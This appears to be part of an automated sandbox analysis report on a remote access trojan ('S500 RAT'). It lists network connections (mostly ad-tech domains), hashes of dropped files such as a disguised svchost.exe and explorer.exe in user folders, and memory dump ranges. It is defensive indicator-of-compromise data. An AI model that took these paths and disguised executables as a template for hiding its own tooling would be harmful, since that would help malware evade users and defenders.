GB 142.250.200.36:443 www.google.com tcp
GB 104.86.110.33:443 player.aniview.com tcp
US 96.46.186.186:443 track4.aniview.com tcp
NL 213.19.162.90:443 pixel.rubiconproject.com tcp
GB 104.86.111.34:443 feed.avplayer.com tcp
GB 185.64.190.89:443 st.pubmatic.com tcp
GB 2.23.160.192:443 ads.pubmatic.com tcp
US 8.8.8.8:53 115.50.239.18.in-addr.arpa udp
US 8.8.8.8:53 222.16.128.108.in-addr.arpa udp
US 8.8.8.8:53 33.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 131.169.93.208.in-addr.arpa udp
US 8.8.8.8:53 205.127.47.198.in-addr.arpa udp
US 8.8.8.8:53 226.212.58.216.in-addr.arpa udp
US 8.8.8.8:53 118.120.48.52.in-addr.arpa udp
US 8.8.8.8:53 248.2.93.185.in-addr.arpa udp
GB 216.58.212.226:443 googleads.g.doubleclick.net udp
GB 142.250.200.36:443 www.google.com udp
GB 104.86.110.33:443 content1.avplayer.com tcp
GB 104.86.110.33:443 content1.avplayer.com tcp
GB 2.23.161.247:443 tg1.aniview.com tcp
US 34.120.111.33:443 cdn.edkt.io udp
US 173.0.146.6:443 go1.aniview.com tcp
US 13.248.245.213:443 eb2.3lift.com tcp
US 151.101.1.108:443 acdn.adnxs.com tcp
US 8.8.8.8:53 pixel-sync.sitescout.com udp
NL 35.214.149.91:443 x.bidswitch.net tcp
NL 193.0.160.131:443 p.rfihub.com tcp
NL 178.250.1.9:443 dis.criteo.com tcp
US 216.200.232.249:443 sync.mathtag.com tcp
US 34.36.216.150:443 pixel-sync.sitescout.com tcp
US 34.120.133.55:443 api.rlcdn.com tcp
US 54.225.145.9:443 sync.srv.stackadapt.com tcp
US 54.225.145.9:443 sync.srv.stackadapt.com tcp
FR 178.250.7.13:443 dnacdn.net tcp
IE 52.48.73.249:443 match.prod.bidr.io tcp
NL 185.184.8.90:443 creativecdn.com tcp
FR 185.255.84.153:443 visitor.omnitagjs.com tcp
NL 147.75.84.158:443 sync.a-mo.net tcp
US 34.36.216.150:443 pixel-sync.sitescout.com udp
US 104.16.79.73:443 static.cloudflareinsights.com tcp
FR 178.250.7.13:443 dnacdn.net tcp
US 8.8.8.8:53 onetag-sys.com udp
US 8.8.8.8:53 secure.adnxs.com udp
NL 154.57.158.25:443 ads.stickyadstv.com tcp
NL 89.149.192.245:443 ssbsync.smartadserver.com tcp
US 69.166.1.67:443 sync.go.sonobi.com tcp
US 8.8.8.8:53 108.1.101.151.in-addr.arpa udp
US 8.8.8.8:53 213.245.248.13.in-addr.arpa udp
US 8.8.8.8:53 91.149.214.35.in-addr.arpa udp
US 8.8.8.8:53 55.133.120.34.in-addr.arpa udp
US 8.8.8.8:53 150.216.36.34.in-addr.arpa udp
US 8.8.8.8:53 9.1.250.178.in-addr.arpa udp
US 8.8.8.8:53 90.8.184.185.in-addr.arpa udp
US 8.8.8.8:53 131.160.0.193.in-addr.arpa udp
US 8.8.8.8:53 13.7.250.178.in-addr.arpa udp
US 8.8.8.8:53 153.84.255.185.in-addr.arpa udp
US 8.8.8.8:53 249.73.48.52.in-addr.arpa udp
US 8.8.8.8:53 158.84.75.147.in-addr.arpa udp
US 8.8.8.8:53 9.145.225.54.in-addr.arpa udp
US 69.166.1.67:443 sync.go.sonobi.com tcp
NL 89.149.192.245:443 ssbsync.smartadserver.com tcp
NL 154.57.158.25:443 ads.stickyadstv.com tcp
DE 3.121.240.222:443 match.sharethrough.com tcp
NL 35.214.149.91:443 x.bidswitch.net tcp
GB 104.86.110.33:443 content1.avplayer.com udp
NL 154.57.158.25:443 ads.stickyadstv.com tcp
NL 46.228.174.117:443 sync.1rx.io tcp
US 34.98.64.218:443 u.openx.net udp
GB 104.86.110.33:443 content1.avplayer.com tcp
GB 104.86.110.33:443 content1.avplayer.com tcp
IE 54.76.134.176:443 ap.lijit.com tcp
IE 54.76.134.176:443 ap.lijit.com tcp
US 96.46.186.176:443 s2s.aniview.com tcp
US 8.2.110.134:443 cs.krushmedia.com tcp
GB 23.215.239.190:443 secure-assets.rubiconproject.com tcp
US 8.2.110.134:443 cs.krushmedia.com tcp
US 104.19.159.19:443 assets.a-mo.net tcp
DE 3.75.62.37:443 ups.analytics.yahoo.com tcp
US 96.46.186.182:443 sync.aniview.com tcp
US 96.46.186.182:443 sync.aniview.com tcp
US 96.46.186.182:443 sync.aniview.com tcp
US 96.46.186.182:443 sync.aniview.com tcp
US 96.46.186.182:443 sync.aniview.com tcp
DE 51.38.120.206:443 onetag-sys.com tcp
US 52.205.107.134:443 ssp.disqus.com tcp
US 96.46.186.182:443 sync.aniview.com tcp
DE 52.57.233.5:443 optimized-by.rubiconproject.com tcp
GB 216.58.204.74:443 imasdk.googleapis.com tcp
GB 2.19.169.222:443 eus.rubiconproject.com tcp
US 8.8.8.8:53 182.186.46.96.in-addr.arpa udp
US 8.8.8.8:53 74.204.58.216.in-addr.arpa udp
US 8.8.8.8:53 134.107.205.52.in-addr.arpa udp
US 8.8.8.8:53 222.169.19.2.in-addr.arpa udp
US 96.46.186.15:443 track1.avplayer.com tcp
NL 46.228.174.115:443 targeting.unrulymedia.com tcp
GB 216.58.204.74:443 imasdk.googleapis.com udp
GB 216.58.201.102:443 s0.2mdn.net tcp
GB 142.250.187.226:443 pubads.g.doubleclick.net tcp
GB 142.250.187.226:443 pubads.g.doubleclick.net tcp
GB 142.250.187.226:443 pubads.g.doubleclick.net tcp
GB 142.250.187.226:443 pubads.g.doubleclick.net tcp
US 142.250.101.120:443 csi.gstatic.com tcp
US 142.250.101.120:443 csi.gstatic.com tcp
US 142.250.101.120:443 csi.gstatic.com tcp
GB 142.250.187.226:443 pubads.g.doubleclick.net udp
US 142.250.101.120:443 csi.gstatic.com tcp
NL 18.65.39.39:443 public.servenobid.com tcp
DE 51.38.120.206:443 onetag-sys.com udp
US 67.202.105.21:443 ssc-cms.33across.com tcp
NL 18.239.50.8:443 api-2-0.spot.im tcp
NL 35.214.244.54:443 csync.loopme.me tcp
US 70.42.32.63:443 b1sync.zemanta.com tcp
US 70.42.32.63:443 b1sync.zemanta.com tcp
NL 198.47.127.18:443 image8.pubmatic.com tcp
IE 52.51.67.139:443 jadserve.postrelease.com tcp
US 18.214.68.92:443 cs-server-s2s.yellowblue.io tcp
US 80.77.87.166:443 cs.admanmedia.com tcp
US 192.132.33.67:443 bttrack.com tcp
US 35.244.174.68:443 id.rlcdn.com tcp
IE 52.215.200.207:443 a.audrte.com tcp
FR 164.132.25.184:443 rtb-csync.smartadserver.com tcp
US 80.77.87.166:443 cs.admanmedia.com tcp
US 8.8.8.8:53 92.68.214.18.in-addr.arpa udp
US 8.8.8.8:53 67.33.132.192.in-addr.arpa udp
FR 185.86.139.85:443 prg.smartadserver.com tcp
US 69.166.1.8:443 apex.go.sonobi.com tcp
US 142.250.101.120:443 csi.gstatic.com udp
US 80.77.87.166:443 cs.admanmedia.com tcp
US 80.77.87.166:443 cs.admanmedia.com tcp
NL 82.145.213.8:443 t.adx.opera.com tcp
NL 213.19.162.90:443 pixel-eu.rubiconproject.com tcp
DE 3.122.34.216:443 rtb.mfadsrvr.com tcp
FR 178.32.210.230:443 ssbsync-global.smartadserver.com tcp
FR 178.32.210.230:443 ssbsync-global.smartadserver.com tcp
NL 46.228.174.117:443 sync.1rx.io tcp
US 69.166.1.67:443 sync.go.sonobi.com tcp
NL 18.239.18.40:443 cs-rtb.minutemedia-prebid.com tcp
GB 2.23.160.20:443 hbx.media.net tcp
IE 34.254.79.166:443 ads.servenobid.com tcp
US 104.18.42.227:443 cdn.dxkulture.com tcp
IE 54.77.212.111:443 ce.lijit.com tcp
US 52.46.130.91:443 s.amazon-adsystem.com tcp
US 172.64.151.101:443 ssum.casalemedia.com tcp
NL 77.245.57.72:443 sync.adkernel.com tcp
US 52.46.130.91:443 s.amazon-adsystem.com tcp
NL 46.228.174.117:443 sync.1rx.io tcp
US 69.166.1.67:443 sync.go.sonobi.com tcp
US 80.77.87.166:443 cs.admanmedia.com tcp
DE 3.122.34.216:443 rtb.mfadsrvr.com tcp
DE 3.122.34.216:443 rtb.mfadsrvr.com tcp
DE 3.122.34.216:443 rtb.mfadsrvr.com tcp
US 8.8.8.8:53 111.212.77.54.in-addr.arpa udp
US 8.8.8.8:53 91.130.46.52.in-addr.arpa udp
US 8.8.8.8:53 bid.g.doubleclick.net udp
IE 52.48.195.236:443 g2.gumgum.com tcp
IE 52.48.195.236:443 g2.gumgum.com tcp
GB 185.64.190.81:443 simage4.pubmatic.com tcp
GB 185.64.190.81:443 simage4.pubmatic.com tcp
US 169.197.150.7:443 match.deepintent.com tcp
US 54.157.68.100:443 sync.ipredictive.com tcp
IE 52.51.201.51:443 pr-bh.ybp.yahoo.com tcp
JP 124.146.153.165:443 tg.socdm.com tcp
DK 37.157.4.29:443 c1.adform.net tcp
IE 34.247.205.196:443 usersync.gumgum.com tcp
IE 34.247.205.196:443 usersync.gumgum.com tcp
IE 34.247.205.196:443 usersync.gumgum.com tcp
JP 124.146.153.165:443 tg.socdm.com tcp
IE 34.247.205.196:443 usersync.gumgum.com tcp
US 80.77.87.166:443 cs.admanmedia.com tcp
US 35.186.253.211:443 rtb.openx.net tcp
US 35.186.253.211:443 rtb.openx.net udp
NL 79.127.227.46:443 id.rtb.mx tcp
NL 79.127.227.46:443 id.rtb.mx tcp
NL 79.127.227.46:443 id.rtb.mx tcp
NL 79.127.227.46:443 id.rtb.mx tcp
GB 185.64.190.84:443 ow.pubmatic.com tcp
GB 185.64.190.84:443 ow.pubmatic.com tcp
NL 213.19.162.71:443 prebid-server.rubiconproject.com tcp
NL 213.19.162.71:443 prebid-server.rubiconproject.com tcp
US 45.55.126.71:443 ads.dxkulture.com tcp
US 45.55.126.71:443 ads.dxkulture.com tcp
NL 193.3.178.3:443 ads.us.e-planning.net tcp
US 45.55.126.71:443 ads.dxkulture.com tcp
NL 77.245.57.72:443 sync.adkernel.com tcp
DE 79.127.216.47:443 id.rtb.mx tcp
DE 79.127.216.47:443 id.rtb.mx tcp
DE 79.127.216.47:443 id.rtb.mx tcp
DE 79.127.216.47:443 id.rtb.mx tcp
DK 37.157.4.29:443 c1.adform.net tcp
US 45.55.126.71:443 ads.dxkulture.com tcp
US 45.55.126.71:443 ads.dxkulture.com tcp
FR 164.132.25.184:443 rtb-csync.smartadserver.com tcp
NL 178.250.1.7:443 ssp-sync.criteo.com tcp
FR 178.32.210.230:443 ssbsync-global.smartadserver.com tcp
FR 178.32.210.230:443 ssbsync-global.smartadserver.com tcp

Files

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 0e10a8550dceecf34b33a98b85d5fa0b
SHA1 357ed761cbff74e7f3f75cd15074b4f7f3bcdce0
SHA256 5694744f7e6c49068383af6569df880eed386f56062933708c8716f4221cac61
SHA512 fe6815e41c7643ddb7755cc542d478814f47acea5339df0b5265d9969d02c59ece6fc61150c6c75de3f4f59b052bc2a4f58a14caa3675daeb67955b4dc416d3a

\??\pipe\LOCAL\crashpad_4072_DJRBNLFHLQIOUTRN

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 3b1e59e67b947d63336fe9c8a1a5cebc
SHA1 5dc7146555c05d8eb1c9680b1b5c98537dd19b91
SHA256 7fccd8c81f41a2684315ad9c86ef0861ecf1f2bf5d13050f760f52aef9b4a263
SHA512 2d9b8f574f7f669c109f7e0d9714b84798e07966341a0200baac01ed5939b611c7ff75bf1978fe06e37e813df277b092ba68051fae9ba997fd529962e2e5d7b0

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 e9c578b1c1b5a43ccf3d24ec802695df
SHA1 57a276b765d8aaff6b3c09d28e515816c1621f70
SHA256 193fbb98264f8ba47f3549d8e11f097f37995b09b926b482738e4222b92ac12a
SHA512 8f4f82aebfddb9dfbe236a45af1443d36aefb9ba33ffd7a9e61c8227456e47c72945599468d44bb8869a15ca6e54b80d039b6471dd6f943fd2d432b6481430a6

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 7f90ebe7923b35cb1258687796069a2e
SHA1 c427b64c414d9227651a467a93594ea33a04116d
SHA256 e8555038303a25d063dee3ca242536e89c1712eb36aae105c14b9d86dc26df51
SHA512 997bb2352755a080353a5bc33834be12b1d88f479b3bfd05259209fa460a901b6adb97f0169de9a8124c3862968783894c9c4828c9474ab8d8c675a324e2cd5c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 e72b5b9f93cd456131764f6c821aa8bd
SHA1 a014d2ee7717496299d5038f6eaca51b830c73e7
SHA256 8e041652d69e49c2c759def7d1d9051aba9d693e732ed0727b89924c9de484bd
SHA512 bd948ffcccd6f0f110b56d75282552bdf554e3c7f197452cd598c999e7047acfdebee58f4779fc1d71a15fad2727e8c341d8793848181998cfa9016ecbf79149

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000024

MD5 4322f0449af173fb3994d2bef7ecb2e4
SHA1 b6ee5c6f76b8eee448f6b4b2b56fa1ec39653934
SHA256 0502e6e2f3fc54a30dea0eb07eb19a395c7ea6fc273321a49a4cc977a59b7cc9
SHA512 d8bae6131a5a8a1fcabb2d7efebc6cdbba27955fb77484a5d87dbce7a237c0cd5e19b74b4dad28312929ad732d3b80cf3d7f15f059c88438d0bc6ff9535ceeef

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\IndexedDB\https_prebid.a-mo.net_0.indexeddb.leveldb\CURRENT

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 6752a1d65b201c13b62ea44016eb221f
SHA1 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe57cc29.TMP

MD5 403b37e5a015e522e21907a98ffac8e0
SHA1 cb135cac9dda15f697a8f5397d2994b236e2d884
SHA256 b65ff529070ebabb94b93fc21074e182e609165858089923017debb81da408e9
SHA512 0701b033ae9416a9d41761cd5382b03327ee91f2bad76d96d197d75318bb377e5e849cf5e47177c49b37fcb467702fe4e702a9b1c3c13382348436defdcf8a31

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\ab21fdfa-129e-4c38-9637-3c52f9d33bb2.tmp

MD5 1277f1e51603f6f41ebdf61ab03dd0a6
SHA1 d4d347b1b41b11d2e4aa7a67a6c6e63982a8d38f
SHA256 2292bf4a0ffe617214e7368b44b0470a819a53cd4821e206c6d5ca40018ceeaa
SHA512 31afd54f372273436341999005f5f5e001ab1f195f2ac78f4a35dad16ef919db47625299374e15265a3c530fe17bdcea4fd67e29c4e29ca1b161dfcfa297ab5d

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 d60186b1508f394872b3cafd4a9dbe68
SHA1 73e63e5b502943443a7fccac57acfe6b5595de43
SHA256 bc432f0b4c185b17d291d25aabc1b5e4854e3677e9730c7f0de7182594bce067
SHA512 0941a6a3de156d91d535e49ad2e872d281492d5bfce8d84de401aa3f11d3e0984a5247815efa62bc33d486503bcd302d3c637e1c1a8c17e2fb0a7470c636d1ad

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 f78210101ce7b7ebc77fca102889483c
SHA1 e8a8ab4634b95840a990168ddf2a424d041425e5
SHA256 1ae3a97c4ee0b1cd8b97cc7228e770f8b5d59c8cabe5cdeac3065d4278d479a0
SHA512 f9f8a141edecedc2541f9c2fdceef64b705a3a70098c2f17c69af5971607fc8673f346e66852b22212065eb345dd641940495f3fe226edf57cc7d94b72af2eae

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 5a95222fdb9782ae8c413036d7cc155a
SHA1 42cadfaba3580b6c1af1ecbecb98aa1edd8e26c7
SHA256 992f2673dc1e66274790d269c085ad13bd754461a4f502c09b8cd1750c711c49
SHA512 cc477a9b63b25189069edbbedc8a7ed95d7c392397e426a83e05b89ed6055a71ba7db7eac46b06b5663275f27b56a069d657e045bc0a0a49acb6dc4d1bacd164

C:\Users\Admin\Downloads\S500 RAT.zip:Zone.Identifier

MD5 fbccf14d504b7b2dbcb5a5bda75bd93b
SHA1 d59fc84cdd5217c6cf74785703655f78da6b582b
SHA256 eacd09517ce90d34ba562171d15ac40d302f0e691b439f91be1b6406e25f5913
SHA512 aa1d2b1ea3c9de3ccadb319d4e3e3276a2f27dd1a5244fe72de2b6f94083dddc762480482c5c2e53f803cd9e3973ddefc68966f974e124307b5043e654443b98

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 3df2138cb6434a325aab0d988a9e5373
SHA1 85870c7017215c04de646964e2671f614f548bb5
SHA256 44788b3cdb8fce1a0156c90f73434cc417fcb98cf34545d82dc17fe6f5843040
SHA512 807820e0b54f67acb46c169e38bb6d53c6e806139f4791a242bf6f59e6522d501c6fe63c3c589aeadf02c014e24329f33c1ed136abccbc278f4ec1549852bf60

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 7194e6493ad2747898f5dad893f80f83
SHA1 53673ef5cc6cbf2c95f52c53561af2df98ec1ca8
SHA256 50f059eb82f118579272b2d8248333252955363bb8eb5e023782594bfeaa5dd0
SHA512 ca55ebb175e42d60650ce639b9d237d2e71081bd3186a09bdb09ce81c200d3109d45ec8daa44c6fd7035039c4c686b083b76a0bdc6aba4c020a074d1893c9bf8

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 fef5f30fe1b54fba410ef91a7a017ab4
SHA1 62c7d232a95a7b40ad10e395da8403e915327220
SHA256 ab9d6bce034218737228023d0f6f1091ea79157e296b9557963508379b9dccb6
SHA512 2800446cf7189a78c23b5f4363bf22900045b8bef394f1222c447541cf6dd46ca5cbe5958e43960500227250bc5ce5db5080577d96e9f6f27bcad099c9485481

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 2e05776b5f163a10fa6f1109ed112231
SHA1 e3a9bdfc710b6a46d5b5c614a589dbe0b0fe79e6
SHA256 7d0ad4464357229df6892c7d9bd0acbb28447322e0bd64dea7e34bf0dbfddfef
SHA512 fa46860df5b4a7961f0a6c634cb19d75299407ae6ffb0a13907502e244a84b5394d8fdf00e10755a44833f177b6428d6940f7a970bb6dcdca8d4884b1973965f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 ce8cf3c8ab49fc0c416ac94820ab4916
SHA1 8008482610bfb94717aafaf40ab24bee04d0b9b4
SHA256 cb57180c604213b5e4239028dab4e96ab78ac7d3d2694acbe3264a6321b3a5f6
SHA512 5ab33f0ba921489664c904c7e90ea75db139022bc95aea3512b8e803462d7c48cc3a5125734409f10435c5f73e3cc78ca0fa86b1474182c2f8b417b56f85d19d

C:\Users\Admin\AppData\Local\Temp\svchost.exe

MD5 2ef91bf37b3da8cad6751b665bd4e6af
SHA1 5c15bbc721f91855388861d378cf9d26a140cead
SHA256 5263ecab05efc0fda51526658fdfa446f6108c009b8c2ddc9dd93ba29ea691b7
SHA512 16f1846fde3d65413d1c478b59761cb5b74c5fa4556c7234858010efc05e81e305c9054895e388e9de85f6a55d05d6ac0236ed85dcdce3b82b0a82b4986eb2a3

C:\Users\Admin\AppData\Roaming\explorer.exe

MD5 ce453607540a4b0e0c88476042d31791
SHA1 9fe09b42424e044a7c11aea2f214a3d86de8f5a1
SHA256 9a10c5b653feff9be0898a0ae18f7479e36275896bd4482f1fec237cf9ce619c
SHA512 f0fdcd4e5fdbc03d4a3bb1eee4b69c6bf2585a609f9fc56739e9320d1072a7935ce126e7dc737ad1592f64023c3a17d0e0dd659a5d3a4ee940ca2301e81912ee

memory/1616-461-0x0000000000FA0000-0x000000000100D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI66042\VCRUNTIME140.dll

MD5 f34eb034aa4a9735218686590cba2e8b
SHA1 2bc20acdcb201676b77a66fa7ec6b53fa2644713
SHA256 9d2b40f0395cc5d1b4d5ea17b84970c29971d448c37104676db577586d4ad1b1
SHA512 d27d5e65e8206bd7923cf2a3c4384fec0fc59e8bc29e25f8c03d039f3741c01d1a8c82979d7b88c10b209db31fbbec23909e976b3ee593dc33481f0050a445af

memory/5244-485-0x00007FFD50E30000-0x00007FFD51296000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI66042\python310.dll

MD5 3f782cf7874b03c1d20ed90d370f4329
SHA1 08a2b4a21092321de1dcad1bb2afb660b0fa7749
SHA256 2a382aff16533054e6de7d13b837a24d97ea2957805730cc7b08b75e369f58d6
SHA512 950c039eb23ed64ca8b2f0a9284ebdb6f0efe71dde5bbf0187357a66c3ab0823418edca34811650270eea967f0e541eece90132f9959d5ba5984405630a99857

C:\Users\Admin\AppData\Local\Temp\_MEI66042\base_library.zip

MD5 c4989bceb9e7e83078812c9532baeea7
SHA1 aafb66ebdb5edc327d7cb6632eb80742be1ad2eb
SHA256 a0f5c7f0bac1ea9dc86d60d20f903cc42cff3f21737426d69d47909fc28b6dcd
SHA512 fb6d431d0f2c8543af8df242337797f981d108755712ec6c134d451aa777d377df085b4046970cc5ac0991922ddf1f37445a51be1a63ef46b0d80841222fb671

memory/3836-494-0x0000000005190000-0x00000000051C6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI66042\unicodedata.pyd

MD5 dfa1f0cd0ad295b31cb9dda2803bbd8c
SHA1 cc68460feae2ff4e9d85a72be58c8011cb318bc2
SHA256 46a90852f6651f20b7c89e71cc63f0154f00a0e7cd543f046020d5ec9ef6cb10
SHA512 7fbdfd56e12c8f030483f4d033f1b920968ea87687e9896f418e9cf1b9e345e2be2dc8f1ea1a8afb0040a376ffb7a5dc0db27d84fb8291b50e2ed3b10c10168e

memory/5420-495-0x0000000074800000-0x0000000074FB1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI66042\select.pyd

MD5 5c66bcf3cc3c364ecac7cf40ad28d8f0
SHA1 faf0848c231bf120dc9f749f726c807874d9d612
SHA256 26dada1a4730a51a0e3aa62e7abc7e6517a4dc48f02616e0b6e5291014a809cc
SHA512 034cd4c70c4e0d95d6bb3f72751c07b8b91918aabe59abf9009c60aa22600247694d6b9e232fefff78868aad20f5f5548e8740659036096fab44b65f6c4f8db6

memory/5244-501-0x00007FFD51A20000-0x00007FFD51A44000-memory.dmp

memory/5420-502-0x00000000054C0000-0x0000000005AEA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI66042\libcrypto-1_1.dll

MD5 e5aecaf59c67d6dd7c7979dfb49ed3b0
SHA1 b0a292065e1b3875f015277b90d183b875451450
SHA256 9d2257d0de8172bcc8f2dba431eb91bd5b8ac5a9cbe998f1dcac0fac818800b1
SHA512 145eaa969a1a14686ab99e84841b0998cf1f726709ccd177acfb751d0db9aa70006087a13bf3693bc0b57a0295a48c631d0b80c52472c97ebe88be5c528022b4

C:\Users\Admin\AppData\Local\Temp\_MEI66042\libffi-7.dll

MD5 6f818913fafe8e4df7fedc46131f201f
SHA1 bbb7ba3edbd4783f7f973d97b0b568cc69cadac5
SHA256 3f94ee4f23f6c7702ab0cc12995a6457bf22183fa828c30cc12288adf153ae56
SHA512 5473fe57dc40af44edb4f8a7efd68c512784649d51b2045d570c7e49399990285b59cfa6bcd25ef1316e0a073ea2a89fe46be3bfc33f05e3333037a1fd3a6639

memory/3836-503-0x0000000074800000-0x0000000074FB1000-memory.dmp

memory/5420-504-0x0000000004E80000-0x0000000004E90000-memory.dmp

memory/3836-505-0x0000000005300000-0x0000000005310000-memory.dmp

memory/5244-506-0x00007FFD63E70000-0x00007FFD63E88000-memory.dmp

memory/5244-507-0x00007FFD50E00000-0x00007FFD50E2C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI66042\_ctypes.pyd

MD5 48ce90022e97f72114a95630ba43b8fb
SHA1 f2eba0434ec204d8c6ca4f01af33ef34f09b52fd
SHA256 5998de3112a710248d29df76a05272775bf08a8dbc5a051a7ecb909fef069635
SHA512 7e6c2591805136f74c413b9633d5fdc4428e6f01e0e632b278bee98170b4f418ef2afd237c09e60b0e72076924ed0e3ffb0e2453e543b5e030b263f64568fab8

memory/5244-508-0x00007FFD68B40000-0x00007FFD68B4F000-memory.dmp

memory/5420-509-0x0000000005200000-0x0000000005222000-memory.dmp

memory/5420-510-0x00000000052A0000-0x0000000005306000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ptvj2qfy.obx.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/5420-511-0x0000000005420000-0x0000000005486000-memory.dmp

memory/5420-525-0x0000000005CE0000-0x0000000006037000-memory.dmp

memory/5244-529-0x00007FFD50E30000-0x00007FFD51296000-memory.dmp

memory/5420-532-0x00000000060B0000-0x00000000060CE000-memory.dmp

memory/5420-534-0x00000000060E0000-0x000000000612C000-memory.dmp

memory/1616-536-0x0000000003A00000-0x0000000003E00000-memory.dmp

memory/1616-538-0x0000000003A00000-0x0000000003E00000-memory.dmp

memory/1616-537-0x0000000003A00000-0x0000000003E00000-memory.dmp

memory/1616-540-0x00007FFD744C0000-0x00007FFD746C9000-memory.dmp

memory/1616-543-0x0000000003A00000-0x0000000003E00000-memory.dmp

memory/6924-544-0x0000000000110000-0x0000000000119000-memory.dmp

memory/1616-542-0x0000000075C50000-0x0000000075EA2000-memory.dmp

memory/1616-546-0x0000000000FA0000-0x000000000100D000-memory.dmp

memory/6924-548-0x0000000001F10000-0x0000000002310000-memory.dmp

memory/1616-549-0x00007FFD744C0000-0x00007FFD746C9000-memory.dmp

memory/6924-550-0x00007FFD744C0000-0x00007FFD746C9000-memory.dmp

memory/6924-551-0x0000000001F10000-0x0000000002310000-memory.dmp

memory/6924-554-0x0000000075C50000-0x0000000075EA2000-memory.dmp

memory/6924-553-0x00007FFD744C0000-0x00007FFD746C9000-memory.dmp

memory/5604-569-0x00007FFD5BF70000-0x00007FFD5C3D6000-memory.dmp

memory/5604-570-0x00007FFD6AC90000-0x00007FFD6ACB4000-memory.dmp

memory/5604-571-0x00007FFD6EF00000-0x00007FFD6EF0F000-memory.dmp

memory/5604-576-0x00007FFD68B40000-0x00007FFD68B4D000-memory.dmp

memory/5420-575-0x0000000007660000-0x0000000007CDA000-memory.dmp

memory/5604-579-0x00007FFD6AC70000-0x00007FFD6AC88000-memory.dmp

memory/6924-578-0x00007FFD744C0000-0x00007FFD746C9000-memory.dmp

memory/5420-577-0x00000000065C0000-0x00000000065DA000-memory.dmp

memory/5420-580-0x0000000008290000-0x0000000008836000-memory.dmp

memory/5420-581-0x00000000074F0000-0x0000000007582000-memory.dmp

memory/5604-573-0x00007FFD681D0000-0x00007FFD681E9000-memory.dmp

memory/6924-574-0x0000000001F10000-0x0000000002310000-memory.dmp

memory/5604-572-0x00007FFD6AC40000-0x00007FFD6AC6C000-memory.dmp

memory/3836-585-0x00000000709F0000-0x0000000070A3C000-memory.dmp

memory/3836-584-0x000000007F1C0000-0x000000007F1D0000-memory.dmp

memory/3836-582-0x0000000007800000-0x0000000007834000-memory.dmp

memory/5420-583-0x0000000074800000-0x0000000074FB1000-memory.dmp

memory/3836-594-0x0000000006C30000-0x0000000006C4E000-memory.dmp

memory/3836-595-0x0000000074800000-0x0000000074FB1000-memory.dmp

memory/5420-597-0x0000000004E80000-0x0000000004E90000-memory.dmp

memory/3836-598-0x0000000005300000-0x0000000005310000-memory.dmp

memory/5420-599-0x0000000004E80000-0x0000000004E90000-memory.dmp

memory/3836-596-0x0000000007850000-0x00000000078F4000-memory.dmp

memory/3836-600-0x0000000007A40000-0x0000000007A4A000-memory.dmp

memory/3836-601-0x0000000007C40000-0x0000000007CD6000-memory.dmp

memory/3836-602-0x0000000007BC0000-0x0000000007BD1000-memory.dmp

memory/3836-605-0x0000000007C00000-0x0000000007C0E000-memory.dmp

memory/3836-606-0x0000000007C10000-0x0000000007C25000-memory.dmp

memory/3836-607-0x0000000007D00000-0x0000000007D1A000-memory.dmp

memory/3836-608-0x0000000007CF0000-0x0000000007CF8000-memory.dmp

memory/3836-611-0x0000000074800000-0x0000000074FB1000-memory.dmp

